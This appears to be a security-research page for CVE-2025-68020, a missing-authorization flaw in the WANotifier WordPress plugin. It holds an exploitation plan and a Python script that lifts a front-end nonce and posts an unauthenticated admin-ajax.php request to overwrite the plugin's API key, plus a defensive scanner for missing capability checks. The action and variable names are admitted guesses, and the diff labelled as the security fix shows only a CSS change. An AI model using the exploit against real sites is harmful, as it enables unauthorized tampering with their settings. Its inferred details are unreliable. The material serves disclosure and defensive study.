CVE-2025-68020

WANotifier <= 2.7.13 - Missing Authorization

Severity
medium (Missing Authorization)
CVSS Score
5.3
Patched in
3.0.0
Time to patch
86 days

Description

The WANotifier plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.7.13. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Technical Details

Affected versions
<= 2.7.13
Published
January 20, 2026
Last updated
April 15, 2026
Affected plugin
notifier (WordPress.org slug)

What Changed in the Fix

Changes introduced in v3.0.0


Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan - CVE-2025-68020

1. Vulnerability Summary

The Notifications for Forms & WordPress Actions (WANotifier) plugin (versions <= 2.7.13) contains a missing authorization vulnerability. Specifically, an AJAX handler registered via wp_ajax_ (and potentially wp_ajax_nopriv_) fails to perform a capability check (e.g., current_user_can( 'manage_options' )) before performing sensitive actions. This allows an attacker to modify plugin settings, such as the WANotifier API key or other configuration parameters, leading to a loss of integrity in notification delivery.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: notifier_save_settings (inferred based on plugin functionality) or similar settings-related action.
  • Vulnerable Parameter: settings (array) or specific keys like wanotifier_api_key.
  • Authentication: The CVSS vector's PR:N (Privileges Required: None) indicates unauthenticated access is possible. This implies either a wp_ajax_nopriv_ registration or a wp_ajax_ handler that never verifies the caller is logged in and authorized.
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Registration: The plugin registers an AJAX action in its initialization (likely in a class handling admin or settings):
    add_action( 'wp_ajax_notifier_save_settings', [ $this, 'save_settings' ] );
    add_action( 'wp_ajax_nopriv_notifier_save_settings', [ $this, 'save_settings' ] );
  2. Handler Entry: The save_settings function is called.
    3. Missing Check: The function validates a nonce with check_ajax_referer but never calls current_user_can('manage_options'). A nonce only proves the request was assembled from a page on which WordPress rendered that nonce; it is CSRF protection, not an authorization check, so any visitor who can read the nonce passes it.
  4. Sink: The function proceeds to call update_option( 'notifier_settings', $_POST['settings'] ) or similar, updating the database with attacker-supplied values.

4. Nonce Acquisition Strategy

If the vulnerable handler uses check_ajax_referer, a valid nonce is required.

  • JS Variable: Likely localized via wp_localize_script.
  • Search for: wp_create_nonce in the plugin code to identify the action string (e.g., 'notifier_nonce').
  • JS Object: Look for objects like notifier_obj or wanotifier_data in the frontend or backend source.
  • Extraction Method:
    1. Identify where the plugin enqueues scripts (e.g., the Chat Button feature mentioned in README.txt).
    2. Navigate to the homepage.
    3. Execute browser_eval("window.notifier_obj?.nonce") (exact variable name to be determined via grep).

5. Exploitation Strategy

Step 1: Discovery

Use grep to find the vulnerable AJAX registration and handler:

# Find AJAX registrations
grep -r "wp_ajax_" .

# Find handlers that lack capability checks
# Look for functions that update options but don't call current_user_can
grep -r "update_option" . -B 20

Step 2: Identify Nonce and Parameters

Locate the wp_localize_script call to find the JS variable name:

grep -r "wp_localize_script" .

Step 3: Extract Nonce (If required)

If a nonce is needed and available on the frontend:

  1. Navigate to the site root: browser_navigate("http://localhost:8080/")
  2. Extract the nonce: browser_eval("window.notifier_data.nonce") (inferred name)

Step 4: Perform the Exploit

Send a POST request to admin-ajax.php to overwrite the API key:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=notifier_save_settings&nonce=[NONCE]&wanotifier_api_key=ATTACKER_API_KEY
  • Content-Type: application/x-www-form-urlencoded
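As an added example (not code from this page or from the WANotifier plugin), the following Python script carries Steps 3 and 4 out end to end: it parses the nonce from the object wp_localize_script writes into the page, builds the admin-ajax.php POST, and classifies the reply. The object name notifier_data, the action notifier_save_settings, the nonce field name and the embedded page fragment are all assumptions, constructed here to match the inferred names in the plan; they must be replaced with whatever grep finds in the real plugin.

```python
import json
import re
from typing import Optional
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Constructed page fragment in the shape wp_localize_script() emits. The object
# name (notifier_data), its keys and the nonce value are assumptions, not data
# captured from a real WANotifier install.
SAMPLE_HTML = r'''<!doctype html><html><head>
<script id="notifier-chat-js-extra">
/* <![CDATA[ */
var notifier_data = {"ajax_url":"http:\/\/localhost:8080\/wp-admin\/admin-ajax.php","nonce":"4f1c9b2e7a"};
/* ]]> */
</script>
<script src="http://localhost:8080/wp-content/plugins/notifier/assets/js/chat.js"></script>
</head><body></body></html>'''


def extract_localized(html: str, var_name: str) -> dict:
    """Parse the object wp_localize_script assigns with `var <var_name> = {...};`."""
    m = re.search(r"var\s+" + re.escape(var_name) + r"\s*=\s*(\{.*?\});", html, re.S)
    if not m:
        raise LookupError(f"{var_name} is not localized on this page")
    return json.loads(m.group(1))


def build_settings_request(base_url: str, nonce: str, settings: dict,
                           action: str = "notifier_save_settings") -> Request:
    """Build the admin-ajax.php POST from Step 4 without sending it.

    `action` is the inferred action name from the plan, not a confirmed one.
    """
    body = urlencode({"action": action, "nonce": nonce, **settings})
    return Request(base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
                   data=body.encode(), method="POST",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


def interpret(status: int, body: str) -> str:
    """Classify an admin-ajax.php reply the way section 7 describes."""
    if body.strip() == "0":
        # admin-ajax.php answers a bare 0 when no handler is hooked for this
        # action in the caller's authentication state (e.g. no nopriv hook).
        return "no handler ran for this action in the current auth state"
    try:
        data = json.loads(body)
    except ValueError:
        return f"non-JSON reply (HTTP {status})"
    return "settings accepted" if data.get("success") else f"rejected: {data.get('data')}"


def run(base_url: str, settings: dict, html: Optional[str] = None) -> str:
    """Fetch the front page (or use `html`), lift the nonce, send the request."""
    if html is None:
        with urlopen(base_url) as resp:
            html = resp.read().decode()
    nonce = extract_localized(html, "notifier_data")["nonce"]
    req = build_settings_request(base_url, nonce, settings)
    try:
        with urlopen(req) as resp:
            return interpret(resp.status, resp.read().decode())
    except HTTPError as err:        # WordPress uses 4xx for some wp_die() paths
        return interpret(err.code, err.read().decode())
```

Against the lab site from section 6, run("http://localhost:8080", {"wanotifier_api_key": "ATTACKER_API_KEY"}) performs the whole exchange and returns a one-line verdict; the wp option get check in section 8 then confirms whether the write landed. Keeping request construction separate from sending makes the body and headers inspectable in a test before anything touches a target.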

6. Test Data Setup

  1. Install and activate WANotifier 2.7.13.
  2. (Optional) Configure a dummy API key in the settings to have something to overwrite.
  3. Ensure "WhatsApp Chat Button" is enabled in settings (if that's the source of the frontend nonce).

7. Expected Results

  • HTTP Response: 200 OK with a JSON success body (e.g., {"success":true}). A bare 0 body instead means admin-ajax.php found no handler for that action in the current authentication state (for an unauthenticated request, no wp_ajax_nopriv_ registration).
  • Payload Effect: The plugin's internal settings will be updated with the malicious values provided in the POST request.

8. Verification Steps

After the exploit, verify the change using WP-CLI:

# Check the value of the setting in the database
wp option get notifier_settings
# OR if stored as a specific key
wp option get wanotifier_api_key

If the value matches ATTACKER_API_KEY, the exploit is successful.

9. Alternative Approaches

If wp_ajax_nopriv_ is NOT registered, the vulnerability might require a low-privileged user (e.g., Subscriber).

  1. Create a Subscriber user: wp user create attacker attacker@example.com --role=subscriber
  2. Authenticate as Subscriber and repeat the exploit.
  3. If admin-ajax.php is blocked for non-admins, check for REST API endpoints:
    grep -r "register_rest_route" .
    Check if permission_callback is set to __return_true.
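As an added example (not code from this page or from the WANotifier plugin), the following Python script automates the grep-based discovery of Step 1 and the permission_callback check of section 9: it maps every wp_ajax_ / wp_ajax_nopriv_ registration and register_rest_route call to its handler and records whether the handler body checks a nonce, calls current_user_can(), and writes an option. It runs over a constructed PHP sample that follows the inferred code flow of section 3; the class, option, nonce and action names in that sample are assumptions, and the hardened reset_settings handler shows what the missing check would look like, not what 3.0.0 actually does. The scanner recognises only `[ $obj, 'method' ]` and plain-string callbacks, which is enough to triage a plugin before reading the flagged handlers by hand.

```python
import re
from dataclasses import dataclass

# Constructed PHP sample in the shape of the code flow inferred in section 3. Class,
# option, nonce and action names are assumptions, not WANotifier code. It bundles a
# vulnerable AJAX handler, a hardened one, and a REST route with an open permission_callback.
SAMPLE_PLUGIN_PHP = r'''<?php
class Notifier_Settings {
    public function __construct() {
        add_action( 'wp_ajax_notifier_save_settings', [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_nopriv_notifier_save_settings', [ $this, 'save_settings' ] );
        add_action( 'wp_ajax_notifier_reset_settings', [ $this, 'reset_settings' ] );
        add_action( 'rest_api_init', function () {
            register_rest_route( 'notifier/v1', '/settings', [
                'methods'             => 'POST',
                'callback'            => [ $this, 'rest_save' ],
                'permission_callback' => '__return_true',
            ] );
        } );
    }
    // Vulnerable shape: the nonce is checked, the capability is not.
    public function save_settings() {
        check_ajax_referer( 'notifier_nonce', 'nonce' );
        update_option( 'notifier_settings', wp_unslash( $_POST['settings'] ) );
        wp_send_json_success();
    }
    // Hardened shape: capability check before the option write.
    public function reset_settings() {
        check_ajax_referer( 'notifier_nonce', 'nonce' );
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        delete_option( 'notifier_settings' );
        wp_send_json_success();
    }
    // Vulnerable shape: open permission_callback and no check inside the callback.
    public function rest_save( $request ) {
        update_option( 'notifier_settings', $request->get_json_params() );
        return rest_ensure_response( [ 'ok' => true ] );
    }
}
'''

# add_action( 'wp_ajax[_nopriv]_<action>', [ $obj, 'method' ] | 'function_name' )
AJAX_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(nopriv_)?([\w-]+)['\"]\s*,\s*"
    r"(?:\[\s*\$\w+\s*,\s*['\"](\w+)['\"]\s*\]|['\"](\w+)['\"])")
SINK_RE = re.compile(r"\b(update|delete|add)_option\s*\(")
CAP_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")


@dataclass
class Finding:
    kind: str           # "ajax" or "rest"
    name: str           # AJAX action, or REST namespace + route
    handler: str
    nopriv: bool        # reachable without a logged-in user
    nonce_check: bool
    cap_check: bool
    writes_option: bool

    @property
    def vulnerable(self) -> bool:
        # A nonce is CSRF protection, not authorization: a handler that writes
        # options without current_user_can() is flagged even if it checks one.
        return self.writes_option and not self.cap_check


def balanced(src: str, start: int, open_ch: str, close_ch: str) -> str:
    """Text inside the bracket pair whose opener sits at src[start]."""
    depth = 0
    for i in range(start, len(src)):
        if src[i] == open_ch:
            depth += 1
        elif src[i] == close_ch:
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
    raise ValueError("unbalanced brackets")


def function_body(src: str, name: str) -> str:
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    return balanced(src, src.index("{", m.end()), "{", "}") if m else ""


def scan_plugin(src: str) -> list:
    """Map every AJAX action and REST route to what its handler checks."""
    found = {}
    for nopriv, action, h1, h2 in AJAX_RE.findall(src):
        body = function_body(src, h1 or h2)
        f = found.setdefault(action, Finding("ajax", action, h1 or h2, False,
            bool(NONCE_RE.search(body)), bool(CAP_RE.search(body)), bool(SINK_RE.search(body))))
        f.nopriv = f.nopriv or bool(nopriv)  # both wp_ajax_ hooks may share one handler
    for m in re.finditer(r"register_rest_route\s*\(", src):
        args = balanced(src, m.end() - 1, "(", ")")
        ns, route = re.findall(r"['\"]([^'\"]+)['\"]", args)[:2]
        cb = re.search(r"['\"]callback['\"]\s*=>\s*\[\s*\$\w+\s*,\s*['\"](\w+)['\"]", args)
        body = function_body(src, cb.group(1)) if cb else ""
        perm = re.search(r"['\"]permission_callback['\"]\s*=>\s*(.+)", args)
        open_route = perm is None or "__return_true" in perm.group(1)
        found[ns + route] = Finding("rest", ns + route, cb.group(1) if cb else "", open_route,
            bool(NONCE_RE.search(body)), (not open_route) or bool(CAP_RE.search(body)),
            bool(SINK_RE.search(body)))
    return list(found.values())
```

Calling scan_plugin(SAMPLE_PLUGIN_PHP) returns one Finding per action or route: notifier_save_settings (nopriv, nonce checked, no capability check, writes an option) and the notifier/v1/settings route come back vulnerable; notifier_reset_settings does not. On a real plugin, run it per PHP file with scan_plugin(open(path).read()) and then read each flagged handler, since a capability check elsewhere in the call chain (a wrapper, a constructor guard, a permission_callback that is a real method) is invisible to this heuristic.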
Research Findings
Static analysis — not yet PoC-verified

Summary

The WANotifier plugin for WordPress is vulnerable to unauthorized settings modification in versions up to and including 2.7.13. This is due to a missing capability check in the AJAX handlers responsible for saving plugin configuration, allowing unauthenticated or low-privileged attackers to overwrite sensitive settings like API keys.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/notifier/2.7.13/assets/css/admin.css /home/deploy/wp-safety.org/data/plugin-versions/notifier/3.0.0/assets/css/admin.css
--- /home/deploy/wp-safety.org/data/plugin-versions/notifier/2.7.13/assets/css/admin.css	2026-02-06 12:53:28.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/notifier/3.0.0/assets/css/admin.css	2026-03-18 12:23:48.000000000 +0000
@@ -1,1054 +1 @@
-.select2-container { box-sizing: border-box; display: inline-block; margin: 0; position: relative; vertical-align: middle; }
-.select2-container .select2-selection--single { box-sizing: border-box; cursor: pointer; display: block; height: 32px; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-user-select: none; }
... (truncated)
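Review bot: this hunk only touches assets/css/admin.css (the select2 stylesheet collapsed from 1054 lines to one), so it contains no authorization change and does not substantiate the "Security Fix" heading; the hunk that closes the missing capability check, presumably the one adding a current_user_can() guard in the AJAX settings handler, is not in this excerpt. Show that hunk here, or state that the diff is limited to the stylesheet, so a reader can confirm the 3.0.0 fix rather than infer it from a CSS minification.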

Exploit Outline

The exploit targets the plugin's AJAX settings-save functionality via the WordPress admin-ajax.php endpoint. An attacker follows these steps:

  1. Identify the AJAX action responsible for saving settings (e.g., 'notifier_save_settings').
  2. Extract a valid security nonce from the frontend of the site, which is typically localized via wp_localize_script for the plugin's WhatsApp chat button functionality (accessible to unauthenticated users).
  3. Send a POST request to /wp-admin/admin-ajax.php with the action parameter, the extracted nonce, and a configuration payload (such as 'wanotifier_api_key=ATTACKER_KEY').
  4. Since the vulnerable handler performs a nonce check but lacks a current_user_can() capability check, the plugin updates its configuration with the attacker-supplied values regardless of the user's authentication status.
